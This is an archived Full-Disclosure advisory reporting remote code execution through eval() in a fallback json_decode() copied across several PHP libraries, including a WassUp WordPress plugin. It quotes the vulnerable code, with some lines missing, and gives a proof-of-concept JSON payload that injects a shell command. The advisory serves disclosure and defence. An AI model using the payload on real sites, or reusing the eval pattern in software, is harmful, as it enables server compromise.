lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 29 Jun 2022 18:02:05 +1000
From: Eldar Marcussen <>
Subject: [FD] JAHx221 - RCE in copy/pasted PHP compat libraries,
	json_decode function

JAHx221 - RCE in copy/pasted PHP compat libraries, json_decode function
Several PHP compatability libraries contain a potential remote code
flaw in their `json_decode()` function based on having copy pasted existing
vulnerable code.

 * JAHx221 -

Affected components
 * WassUp Realtime analytics wordpress plugin/compat library -
 * AjaXplorer Core -
 * FlexoCMS -
 * Various code -
 * compat_functions.php -

This appears to date back to a compatability library published in 2010 and
appears in several code bases, with no, or a few variations.

The vulnerable code generally share the following characteristic:
 * The json_decode function is declared if it does not exist
 * some str_replace occurs to transform the json representation to PHP
 * eval($out)

Since `eval()` is turing complete, it is generally considered unsafe to use
on user controlled or user influenced data, however it is unclear if
exploitation would be possible due to the likely presence of an existing
 json_decode function.

 * compat_functions.php
 * Description: Emulate some functions from PHP 5.2+ and Wordpress 2.6+ for
 *   backwards compatibility with PHP 4.3+ and Wordpress 2.2+, respectively
 * @author: Helene D. <>
 * @version: 0.3 - 2010-09-13
 * @since Wassup 1.8

 * Convert simple JSON data into a PHP object (default) or associative
 *   array. Emulates 'json_decode' function from PHP 5.2+
 * @author: Helene Duncker <>
 * @param string,boolean
 * @return (array or object)
if (!function_exists('json_decode')) {
function json_decode($json,$to_array=false) {
if (!empty($json) && strpos($json,'{"')!==false) {
$out =
if (!$to_array) $x = (object) $x;
return $x;
} //end function json_decode

Proof of Concept
The eval can be exploited a number of ways, both via full or partial
control of the json string:
/* Payload
or partially controlled content:
/* Payload
{"key":"value");echo `id`;//"}
json_decode('{"key":"value");echo `id`;//"}');


Eldar "Wireghoul" Marcussen

Ensure json_decode is present as a native function for your PHP
Sent through the Full Disclosure mailing list
Web Archives & RSS:

Powered by blists - more mailing lists